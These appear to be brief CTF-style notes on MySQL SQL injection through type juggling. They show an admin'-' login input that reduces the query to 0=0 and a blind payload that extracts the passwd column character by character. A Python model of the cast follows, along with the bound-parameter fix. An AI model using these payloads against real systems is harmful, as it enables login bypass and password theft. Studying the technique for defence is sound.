Construct: select * from * where uname = $_POST[uname]
uname=admin'-'
At this point uname = -1, which does not work.
$sql = "select * from users where username='$username'";
When the string value of username is compared with the number 0, the string is converted to 0.
Hence 0=0.
Payload: admin'-(ascii(mid(REVERSE(MID((passwd)from(-%d)))from(-1))
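The string-to-number conversion described above, as an added example that is not part of the original notes: a small Python model of MySQL's implicit cast (leading numeric prefix, otherwise 0) showing which rows the concatenated query matches and why a bound parameter does not. The table contents and function names are assumptions made for illustration, and collation rules are ignored.

```python
import re

# Constructed sample usernames; not data from the original page.
USERS = ["admin", "guest", "1337user", "0day"]

# Leading numeric prefix of a string, as used by MySQL's implicit cast.
_NUM_PREFIX = re.compile(r"\s*[+-]?(?:\d+(?:\.\d*)?|\.\d+)(?:[eE][+-]?\d+)?")
# The one expression shape modelled here: 'left'-'right'
_STRING_MINUS_STRING = re.compile(r"'([^']*)'-'([^']*)'")


def mysql_to_number(value):
    """Model of the implicit cast: numeric prefix if present, else 0."""
    if isinstance(value, (int, float)):
        return float(value)
    m = _NUM_PREFIX.match(value)
    return float(m.group(0)) if m else 0.0


def mysql_equals(column_value, operand):
    """String = string compares as text; a numeric operand forces both sides to numbers."""
    if isinstance(operand, str):
        return column_value == operand
    return mysql_to_number(column_value) == operand


def operand_after_concatenation(uname):
    """What the server compares against when uname is pasted between quotes."""
    text = "'" + uname + "'"
    m = _STRING_MINUS_STRING.fullmatch(text)
    if m:  # the quote in uname split the literal into 'a'-'b', an arithmetic expression
        return mysql_to_number(m.group(1)) - mysql_to_number(m.group(2))
    return uname  # still a single string literal


def rows_for_concatenated(uname):
    operand = operand_after_concatenation(uname)
    return [u for u in USERS if mysql_equals(u, operand)]


def rows_for_bound(uname):
    # A bound parameter is always one string value, so no arithmetic and no cast.
    return [u for u in USERS if mysql_equals(u, uname)]


if __name__ == "__main__":
    print(rows_for_concatenated("admin'-'"))  # every username whose numeric value is 0
    print(rows_for_bound("admin'-'"))         # no row has that literal name
```

Binding the value as a parameter keeps the comparison string-to-string, so the 0=0 match never occurs.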